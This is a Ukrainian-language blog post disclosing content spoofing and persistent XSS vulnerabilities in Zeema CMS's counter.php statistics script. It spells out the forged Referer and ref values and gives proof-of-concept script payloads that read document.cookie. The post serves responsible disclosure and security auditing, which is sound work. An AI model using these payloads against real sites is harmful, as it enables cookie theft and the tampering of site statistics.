CS та XSS уразливості в Zeema CMS

17:20 17.12.2011

03.11.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Content Spoofing та Cross-Site Scripting уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Zeema CMS. Це третя частина з великої кількості уразливостей знайдених в даній CMS. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

17.12.2011

Content Spoofing:

У зв’язку з можливістю прямого звертання до скрипта http://site/counter/counter.php з підробкою параметра ref і заголовка Referer, можна маніпулювати статистикою (з метою підробки реферерів, SEO спама, malware спама і засмічення і перекручування статистики).

Причому, якщо модуль статистики був відключений, то для проведення CS та XSS атак це можна обійти через пряме звернення до скрипта counter.php.

XSS (persistent):

При запитах до зовнішніх сторінок сайта в полі Referer недостатньо перевіряються вхідні дані, що дозволяє провести Persistent XSS атаку. Код виконається на різних сторінках статистики.

При відвідуванні будь-якої зовнішньої сторінки сайта відправити наступне значення заголовка Referer:

Referer: http://site.com/?<script>alert(document.cookie)</script>

При запитах до counter.php недостатньо перевіряються вхідні дані (у параметрі ref), що дозволяє провести Persistent XSS атаку. Код виконається на різних сторінках статистики.

http://site/counter/counter.php?site=counter&screen=1024x768&color=32&ref=http://site.com/?%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

З вказанням заголовка Referer (будь-який URL):

Referer: http://site.com

При запитах до counter.php недостатньо перевіряються вхідні дані (у полі Referer), що дозволяє провести Persistent XSS атаку. Код виконається на різних сторінках статистики.

http://site.com/counter/counter.php?site=counter&screen=1024x768&color=32&ref=http://site.com

З вказанням заголовка Referer:

Referer: http://site.com/?<script>alert(document.cookie)</script>

Уразливі всі версії Zeema CMS. В даній системі є багато інших уразливостей, про які розробники були сповіщені ще у вересні, після завершення аудиту.


Leave a Reply

You must be logged in to post a comment.